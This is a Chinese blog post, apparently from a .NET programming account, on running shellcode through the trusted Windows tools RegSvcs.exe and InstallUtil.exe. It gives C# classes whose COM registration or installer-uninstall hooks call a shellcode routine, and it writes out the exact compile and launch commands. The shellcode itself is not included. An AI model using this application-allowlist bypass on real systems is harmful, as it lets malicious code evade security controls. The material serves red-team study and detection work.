.NET 分享两个白名单程序加载shellcode

0x01 RegSvcs

Regsvcs.exe 是一个Windows命令行程序,位于C:\Windows\Microsoft.NET\Framework\v4.0.30319\ 目录下,通常用于将.NET程序集注册到COM+中,便于将来在COM+事务处理中被调用

密钥

因为.NET 强名称程序集需要通过一个密钥文件才能生成,因此首先需要使用PowerShell创建一个密钥文件key.snk,具体内容如下

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtLlsSJyuICplrCTPGGrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte

使用 Set-Content 将字节数组 $Content 保存到名为 key.snk 的文件中。如下图所示

9fba8a986da88f8429afa28b69d3eb97.png

程序集

.NET实现一个COM组件时需要继承ServicedComponent类,同时还包含了两个特殊的方法,这两个方法是用于在COM对象的注册和注销期间执行shellcode

public class Bypass : ServicedComponent
{
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }
        [ComRegisterFunction] //This executes if registration is successful
        public static void RegisterClass ( string key )
        {
            Console.WriteLine("I shouldn't really execute");
            Shellcode.Exec();
        }
         
        [ComUnregisterFunction] //This executes if registration fails
        public static void UnRegisterClass ( string key )
        {
            Console.WriteLine("I shouldn't really execute either.");
            Shellcode.Exec();
        }
}

运行命令C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll ,添加regsvcs.dll文件到COM+服务,注册时进入RegisterClass方法,触发shellcode执行弹出计算器。如下图所示

9a50cda496eff0da5c5c9a6d7034825d.png

0x02 InstallUtil

InstallUtil.exe 是一个用于安装和卸载.NET Windows服务或托管组件的命令行实用工具,创建一个Sample类,继承自 System.Configuration.Install.Installer

public class Sample : System.Configuration.Install.Installer
  {
      public override void Uninstall(System.Collections.IDictionary savedState)
{
      Shellcode.Exec();  
      }    
  }

首先使用csc编译成 .NET 可执行文件,运行命令C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe InstallUtilcs.cs,这里是输出为 "exeshell.exe",接着使用InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe 成功触发shellcode执行,如下图所示

1200d8c89831429955fb4477a73afd9b.png

-

技术群:添加小编微信并备注进群

小编微信:mm1552923   

公众号:dotNet编程大全    

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值